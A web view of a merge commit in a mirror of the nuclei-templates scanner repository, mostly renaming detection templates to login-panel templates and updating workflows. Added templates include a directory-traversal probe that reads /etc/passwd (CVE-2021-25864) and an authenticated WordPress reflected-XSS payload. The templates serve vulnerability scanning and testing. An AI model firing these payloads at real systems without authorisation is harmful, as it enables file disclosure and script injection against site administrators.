daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'projectdiscovery:master' into dashboard

patch-1
MostInterestingBotInTheWorld 2022-01-31 12:23:38 -05:00 committed by GitHub
parent 8aa51fb650 961deb1994
commit 9aea02db73
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
49 changed files with 472 additions and 193 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

30
.github/workflows/template-db-indexer.yml vendored Normal file
View File

@ -0,0 +1,30 @@
name: 📑 Template-DB Indexer
on:
push:
tags:
- '*'
workflow_dispatch:
jobs:
index:
runs-on: ubuntu-latest
steps:
- uses: actions/setup-go@v2
with:
go-version: 1.17
- name: Intalling Indexer
run: |
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
git clone https://github.com/projectdiscovery/nucleish-api.git
cd nucleish-api/cmd/generate-index/
go install
- name: Generate Index
env:
AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}
AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}
run: |
generate-index -mode templates
generate-index -mode changelog

34
cves/2021/CVE-2021-25864.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2021-25864
info:
name: Hue Magic - Directory Traversal
author: 0x_Akoko
severity: high
description: node-red-contrib-huemagic 3.0.0 is affected by hue/assets/..%2F Directory Traversal.in the res.sendFile API, used in file hue-magic.js, to fetch an arbitrary file.
reference:
- https://github.com/Foddy/node-red-contrib-huemagic/issues/217
- https://www.cvedetails.com/cve/CVE-2021-25864
metadata:
shodan-query: title:"NODE-RED"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-25864
cwe-id: CWE-22
tags: cve,cve2021,huemagic,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

9
technologies/openam-detect.yaml → exposed-panels/openam-panel.yaml
View File

@ -1,10 +1,12 @@
id: openam-detect
id: openam-panel
info:
name: Detect OpenAM and OpenSSO
name: OpenAM and OpenSSO Login Panel
author: philippedelteil
severity: info
tags: tech,openam
metadata:
shodan-query: http.title:"OpenAM"
tags: panel,openam,opensso,login
requests:
- method: GET
@ -16,6 +18,7 @@ requests:
- "{{BaseURL}}/sso/XUI"
- "{{BaseURL}}/sso/UI"
- "{{BaseURL}}/sso/UI/#login"
- "{{BaseURL}}/opensso/UI/Login"
- "{{BaseURL}}/openam/UI/login"
- "{{BaseURL}}/openam/UI/#loginlogin"
- "{{BaseURL}}/openam/UI/Login"

7
technologies/opensis-detect.yaml → exposed-panels/opensis-panel.yaml
View File

@ -1,10 +1,12 @@
id: opensis-detect
info:
name: OpenSIS Detect
name: OpenSIS Login Panel
author: pikpikcu
severity: info
tags: tech,opensis
metadata:
shodan-query: http.title:"openSIS"
tags: panel,opensis,login
requests:
- method: GET
@ -12,6 +14,7 @@ requests:
- "{{BaseURL}}"
- "{{BaseURL}}/opensis/index.php"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

8
technologies/openx-detect.yaml → exposed-panels/openx-panel.yaml
View File

@ -1,10 +1,12 @@
id: openx-detect
id: openx-panel
info:
name: OpenX detect
name: OpenX Login Panel
author: pikpikcu
severity: info
tags: tech,openx
metadata:
shodan-query: http.title:"OpenX"
tags: panel,openx,login
requests:
- method: GET

13
technologies/phpcollab-detect.yaml → exposed-panels/phpcollab-panel.yaml
View File

@ -1,22 +1,29 @@
id: phpcollab-detect
id: phpcollab-panel
info:
name: PhpCollab detect
name: PhpCollab Login Panel
author: pikpikcu
severity: info
tags: tech,phpcollab
metadata:
shodan-query: http.title:"PhpCollab"
tags: panel,phpcollab,login
requests:
- method: GET
path:
- "{{BaseURL}}/general/login.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>PhpCollab</title>'
- type: status
status:
- 200
extractors:
- type: regex
part: body

10
technologies/remkon-manager-detect.yaml → exposed-panels/remkon-manager-panel.yaml
View File

@ -1,10 +1,12 @@
id: remkon-manager-detect
id: remkon-manager-panel
info:
name: Remkon Device Manager Detect
author: pikpikcu
name: Remkon Device Manager Login Panel
author: pikpikcu,daffainfo
severity: info
tags: remkon,tech,panel
metadata:
shodan-query: http.title:"Remkon Device Manager"
tags: panel,remkon,login
requests:
- method: GET

13
technologies/sage-detect.yaml → exposed-panels/sage-panel.yaml
View File

@ -1,10 +1,12 @@
id: sage-detect
id: sage-panel
info:
name: Sage X3 Detect
author: pikpikcu
name: Sage X3 Login Panel
author: pikpikcu,daffainfo
severity: info
tags: tech,sage
metadata:
shodan-query: http.title:"Sage X3"
tags: panel,sage,login
requests:
- method: GET
@ -13,11 +15,12 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Sage X3</title>"
- "'/auth/sage-id/registerStart'"
condition: and
- type: status
status:

31
exposed-panels/seeddms-panel.yaml Normal file
View File

@ -0,0 +1,31 @@
id: seeddms-panel
info:
name: SeedDMS Login Panel
author: pussycat0x,daffainfo
severity: info
metadata:
shodan-query: http.title:"SeedDMS"
tags: panel,seeddms,login
requests:
- method: GET
path:
- "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
- "{{BaseURL}}/dms/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'href="/out/out.ViewFolder.php">SeedDMS</a>'
- 'href="../out/out.ViewFolder.php?folderid=1">SeedDMS</a>'
condition: or
- type: status
status:
- 200

33
exposed-panels/threatq-login.yaml Normal file
View File

@ -0,0 +1,33 @@
id: threatq-login
info:
name: ThreatQ login panel
author: idealphase
severity: info
description: ThreatQ serves as an open and extensible threat intelligence platform that allows you to automate the intelligence lifecycle, quickly understand threats, make better decisions and accelerate detection and response
reference: https://www.threatq.com/threat-intelligence-platform/
tags: panel,threatq
requests:
- method: GET
path:
- '{{BaseURL}}/login'
matchers-condition: and
matchers:
- type: word
words:
- '<title ng-bind="PageTitle.getTitle()">ThreatQ</title>'
- '<script src="/assets/js/threatq.min.js'
condition: or
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<script src="/assets/js/threatq.min.js\?(.*)'

26
exposed-panels/voipmonitor-panel.yaml Normal file
View File

@ -0,0 +1,26 @@
id: voipmonitor-panel
info:
name: VoipMonitor panel
author: Yanyun
severity: info
metadata:
shodan-query: http.title:"VoIPmonitor"
tags: panel,voipmonitor,login
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "appShareUrl = 'share.voipmonitor.org'"
- "VoIPmonitor"
condition: and

37
exposed-panels/wazuh-panel.yaml Normal file
View File

@ -0,0 +1,37 @@
id: wazuh-panel
info:
name: Wazuh Login Panel
author: cyllective,daffainfo
severity: info
description: Wazuh - The Open Source Security Platform
reference: https://github.com/wazuh/wazuh
metadata:
shodan-query: http.title:"Wazuh"
tags: panel,wazuh,login
requests:
- method: GET
path:
- "{{BaseURL}}/app/login"
matchers:
- type: word
part: body
words:
- '&quot;id&quot;:&quot;wazuh&quot;'
- '&quot;title&quot;:&quot;Wazuh&quot;'
- '&quot;icon&quot;:&quot;plugins/wazuh/img/icon_blue.png&quot;'
- '&quot;url&quot;:&quot;/app/wazuh&quot;'
condition: or
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '&quot;version&quot;:&quot;([0-9.]+)&quot;'

32
exposed-panels/webmodule-ee-panel.yaml Normal file
View File

@ -0,0 +1,32 @@
id: webmodule-ee-panel
info:
name: Webmodule Login Panel
author: pussycat0x,daffainfo
severity: info
metadata:
google-dork: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version"
reference: https://www.exploit-db.com/ghdb/7001
tags: panel,webmodule-ee,login
requests:
- method: GET
path:
- "{{BaseURL}}/webmodule-ee/login.seam"
matchers-condition: and
matchers:
- type: word
words:
- "<title>Webmodule</title>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- 'Version: ([0-9.]+)'

30
exposed-panels/xxljob-panel.yaml Normal file
View File

@ -0,0 +1,30 @@
id: xxljob-panel
info:
name: XXLJOB Admin Login Panel
author: pdteam,daffainfo
severity: info
tags: panel,xxljob,login
requests:
- method: GET
path:
- "{{BaseURL}}/xxl-job-admin/toLogin"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<a><b>XXL</b>JOB</a>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '"admin_version":"(.*?)"'

20
technologies/yzmcms-detect.yaml → exposed-panels/yzmcms-panel.yaml
View File

@ -1,10 +1,12 @@
id: yzmcms-detect
id: yzmcms-panel
info:
name: YzmCMS Detect
author: pikpikcu
name: YzmCMS Login Panel
author: pikpikcu,daffainfo
severity: info
tags: yzmcms,tech
metadata:
shodan-query: http.title:"YzmCMS"
tags: panel,yzmcms,login
requests:
- method: GET
@ -13,11 +15,13 @@ requests:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'Powered By <a href="http://www.yzmcms.com"'
- 'Powered By YzmCMS'
condition: or
- type: status
status:
- 200

36
technologies/apollo-server-detect.yaml Normal file
View File

@ -0,0 +1,36 @@
id: apollo-server-detect
info:
name: Apollo Server GraphQL introspection detection
author: idealphase
severity: info
description: Apollo Server is a community-maintained open-source GraphQL server. It works with many Node.js HTTP server frameworks, or can run on its own with a built-in Express server. Apollo Server works with any GraphQL schema built with GraphQL.js--or define a schema's type definitions using schema definition language (SDL).
reference: https://github.com/apollographql/apollo-server
tags: apollo,tect,graphql
requests:
- method: POST
path:
- "{{BaseURL}}/graphql"
headers:
Content-Type: application/json
body: |
{"query":"query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}
matchers-condition: and
matchers:
- type: word
part: header
words:
- "Content-Type: application/json"
- type: word
part: body
words:
- "GraphQL introspection is not allowed by Apollo Server"
- type: status
status:
- 400

0
technologies/sitecore-default-page.yaml → technologies/default-sitecore-page.yaml
View File

30
technologies/jsf-detection.yaml
View File

@ -2,10 +2,10 @@ id: jsf-detection
info:
name: JavaServer Faces Detection
author: Moritz Nentwig
author: brenocss,Moritz Nentwig
severity: info
description: Searches for JavaServer Faces content on a URL.
tags: jsf,tech
tags: jsf,tech,primefaces,richfaces
requests:
- method: GET
@ -13,10 +13,24 @@ requests:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
max-redirects: 3
matchers-condition: or
matchers:
- type: word
words:
- "javax.faces.resource"
- "javax.faces.ViewState"
condition: or
- type: dsl
name: javafaces
dsl:
- "(contains(body, 'javax.faces.resource') || contains(body, 'javax.faces.ViewState'))"
- type: dsl
name: primefaces
dsl:
- "contains(body, 'primefaces')"
- "contains(body, 'javax.faces.resource') || contains(body, 'javax.faces.ViewState')"
condition: and
- type: dsl
name: richfaces
dsl:
- "contains(body, 'richfaces')"
- "contains(body, 'javax.faces.resource') || contains(body, 'javax.faces.ViewState')"
condition: and

5
technologies/pega-detect.yaml
View File

@ -14,12 +14,15 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"description" :"The Pega API'
- type: status
status:
- 200
- type: word
part: header
words:
- 'application/json'
part: header

2
technologies/php-proxy-detect.yaml
View File

@ -29,4 +29,4 @@ requests:
part: body
group: 1
regex:
- 'PHP\-Proxy<\/a> ([0-9.]+)<\/div>'
- '<meta name="version" content="([0-9.]+)">'

6
technologies/redmine-cli-detect.yaml
View File

@ -16,9 +16,9 @@ requests:
- type: word
part: body
words:
- default
- my_id
- root_url
- "default"
- "my_id"
- "root_url"
condition: and
- type: status

1
technologies/sceditor-detect.yaml
View File

@ -18,6 +18,7 @@ requests:
- "<title>Ticket BBCode editor - SCEditor</title>"
- 'title="SCEditor"'
condition: and
- type: status
status:
- 200

21
technologies/seeddms-detect.yaml
View File

@ -1,21 +0,0 @@
id: seeddms-detect
info:
name: Seeddms-
author: pussycat0x
severity: info
tags: tech
requests:
- method: GET
path:
- "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
words:
- "<title>SeedDMS: Sign in</title>"
- type: status
status:
- 200

11
technologies/shopware-detect.yaml
View File

@ -5,10 +5,10 @@ info:
author: cyllective
severity: info
description: Detects Shopware CMS
tags: tech,shopware,cms
reference:
- https://github.com/shopware/shopware
- https://github.com/shopware/platform
tags: tech,shopware,cms
requests:
- method: GET
@ -16,12 +16,17 @@ requests:
- "{{BaseURL}}/admin"
- "{{BaseURL}}/backend"
matchers-condition: and
matchers:
- type: word
part: body
condition: or
words:
- 'Realisiert mit Shopware'
- 'Realised with Shopware'
- 'Shopware Administration (c) shopware AG'
- '<title>Shopware 5 - Backend (c) shopware AG</title>'
- '<title>Shopware 5 - Backend (c) shopware AG</title>'
condition: or
- type: status
status:
- 200

26
technologies/strapi-cms-detect.yaml
View File

@ -1,22 +1,32 @@
id: strapi-cms-detect
info:
name: strapi CMS detect
author: cyllective
name: Strapi CMS detect
author: cyllective,daffainfo
severity: info
description: Detects strapi CMS
description: Open source Node.js Headless CMS to easily build customisable APIs
reference: https://github.com/strapi/strapi
tags: tech,strapi,cms
reference:
- https://github.com/strapi/strapi
requests:
- method: GET
path:
- "{{BaseURL}}/admin/auth/login"
- "{{BaseURL}}/admin/init"
matchers:
- type: word
part: body
condition: or
words:
- '<title>Strapi Admin</title>'
- '"data"'
- '"uuid"'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '"strapiVersion":"([0-9.]+)"'

8
technologies/tech-detect.yaml
View File

@ -3117,6 +3117,12 @@ requests:
- type: word
name: thinkphp
part: header
words:
- "ThinkPHP"
part: header
- type: word
name: apollo
part: body
words:
- "initApollo)(i.ApolloTargetServer.Self)"

4
technologies/terraform-detect.yaml
View File

@ -17,8 +17,8 @@ requests:
- type: word
part: body
words:
- access_key
- terraform
- "access_key"
- "terraform"
condition: and
- type: status

12
technologies/thinkcmf-detection.yaml → technologies/thinkcmf-detect.yaml
View File

@ -1,10 +1,10 @@
id: thinkcmf-detection
info:
name: ThinkCMF Detection
author: pikpikcu
name: Detect ThinkCMF
author: pikpikcu,daffainfo
severity: info
tags: thinkcmf
tags: panel,thinkcmf,login
requests:
- method: GET
@ -13,12 +13,10 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "X-Powered-By: ThinkCMF"
part: header
condition: and
- '<meta name="author" content="ThinkCMF">'
- type: status
status:

0
technologies/vmware-detect.yaml → technologies/vmware/vmware-detect.yaml
View File

0
technologies/vmware-horizon.yaml → technologies/vmware/vmware-horizon.yaml
View File

0
technologies/vmware-site-recovery-manager.yaml → technologies/vmware/vmware-site-recovery-manager.yaml
View File

0
technologies/vmware-vrealize-detect.yaml → technologies/vmware/vmware-vrealize-detect.yaml
View File

24
technologies/voipmonitor-detect.yaml
View File

@ -1,24 +0,0 @@
id: voipmonitor-detect
info:
name: VoipMonitor detect
author: Yanyun
severity: info
tags: tech,voipmonitor
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'share.voipmonitor.org'
- 'VoIPmonitor'
condition: and

25
technologies/wazuh-detect.yaml
View File

@ -1,25 +0,0 @@
id: wazuh-detect
info:
name: wazuh detect
author: cyllective
severity: info
description: Detects wazuh
tags: tech,wazuh
reference:
- https://github.com/wazuh/wazuh
requests:
- method: GET
path:
- "{{BaseURL}}/app/login"
matchers:
- type: word
part: body
condition: or
words:
- '&quot;id&quot;:&quot;wazuh&quot;'
- '&quot;title&quot;:&quot;Wazuh&quot;'
- '&quot;icon&quot;:&quot;plugins/wazuh/img/icon_blue.png&quot;'
- '&quot;url&quot;:&quot;/app/wazuh&quot;'

21
technologies/webmodule-ee.yaml
View File

@ -1,21 +0,0 @@
id: webmodule-ee-detection
info:
name: Webmodule Detection
author: pussycat0x
severity: info
reference: https://www.exploit-db.com/ghdb/7001
tags: webmodule-ee,tech
requests:
- method: GET
path:
- "{{BaseURL}}/webmodule-ee/login.seam"
matchers-condition: and
matchers:
- type: word
words:
- "<title>Webmodule</title>"
- type: status
status:
- 200

1
technologies/werkzeug-debugger-detect.yaml
View File

@ -10,6 +10,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/console"
matchers:
- type: word
words:

9
technologies/wondercms-detect.yaml
View File

@ -11,14 +11,15 @@ requests:
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "Set-Cookie: wondercms_"
- type: word
part: body
words:
- "Powered by WonderCMS"
- "https://www.wondercms.com"
condition: and
- type: status
status:
- 200

3
technologies/wuzhicms-detect.yaml
View File

@ -13,11 +13,12 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Powered by wuzhicms"
- "五指CMS"
condition: or
- type: status
status:

23
technologies/xxljob-admin-detect.yaml
View File

@ -1,23 +0,0 @@
id: xxljob-admin-detect
info:
name: XXLJOB Admin Login
author: pdteam
severity: info
tags: tech,xxljob
requests:
- method: GET
path:
- "{{BaseURL}}/xxl-job-admin/toLogin"
matchers-condition: and
matchers:
- type: word
words:
- "<a><b>XXL</b>JOB</a>"
- type: status
status:
- 200

3
technologies/yapi-detect.yaml
View File

@ -4,6 +4,8 @@ info:
name: YApi Detect
author: pikpikcu
severity: info
metadata:
shodan-query: http.title:"YApi"
tags: tech,yapi
requests:
@ -13,7 +15,6 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:

41
vulnerabilities/wordpress/wp-code-snippets-xss.yaml Normal file
View File

@ -0,0 +1,41 @@
id: wp-code-snippets-xss
info:
name: Code Snippets Wordpress Plugin - XSS
author: dhiyaneshDK
severity: medium
description: A reflected Cross-Site Scripting (XSS) vulnerability has been found in the Code Snippets WordPress Plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, which will execute within the browser of any logged-in admin who views the link
reference: https://www.securify.nl/en/advisory/cross-site-scripting-in-code-snippets-wordpress-plugin/
tags: wordpress,xss,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=snippets&tag=</script><script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '</script><script>alert(document.domain)</script>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

2
workflows/openam-workflow.yaml
View File

@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all OpenAM related nuclei templates on a given target.
workflows:
- template: technologies/openam-detect.yaml
- template: exposed-panels/openam-panel.yaml
subtemplates:
- tags: openam

2
workflows/opensis-workflow.yaml
View File

@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all OpenSIS related nuclei templates on a given target.
workflows:
- template: technologies/opensis-detect.yaml
- template: exposed-panels/opensis-panel.yaml
subtemplates:
- tags: opensis

2
workflows/phpcollab-workflow.yaml
View File

@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all PhpCollab related nuclei templates on a given target.
workflows:
- template: technologies/phpcollab-detect.yaml
- template: exposed-panels/phpcollab-panel.yaml
subtemplates:
- tags: phpcollab

6
workflows/sitecore-workflow.yaml
View File

@ -6,8 +6,6 @@ info:
description: A simple workflow that runs all SiteCore related nuclei templates on a given target.
workflows:
- template: technologies/sitecore-default-page.yaml
- template: exposed-panels/sitecore-login.yaml
- template: technologies/default-sitecore-page.yaml
subtemplates:
- tags: vulnerabilities/sitecore-pre-auth-rce.yaml
- template: misconfiguration/sitecore-debug-page.yaml
- tags: sitecore

2
workflows/thinkcmf-workflow.yaml
View File

@ -5,6 +5,6 @@ info:
description: A simple workflow that runs all ThinkCMF related nuclei templates on a given target.
workflows:
- template: technologies/thinkcmf-detection.yaml
- template: technologies/thinkcmf-detect.yaml
subtemplates:
- tags: thinkcmf

2
workflows/vmware-workflow.yaml
View File

@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all VMware Pipeline related nuclei templates on a given target.
workflows:
- template: technologies/vmware-detect.yaml
- template: technologies/vmware/vmware-detect.yaml
subtemplates:
- tags: vmware

2
workflows/voipmonitor-workflow.yaml
View File

@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all VoipMonitor related nuclei templates on a given target.
workflows:
- template: technologies/voipmonitor-detect.yaml
- template: exposed-panels/voipmonitor-panel.yaml
subtemplates:
- tags: voipmonitor

2
workflows/xxljob-workflow.yaml
View File

@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all XXL-JOB related nuclei templates on a given target.
workflows:
- template: technologies/xxljob-admin-detect.yaml
- template: exposed-panels/xxljob-panel.yaml
subtemplates:
- template: default-logins/xxljob/xxljob-default-login.yaml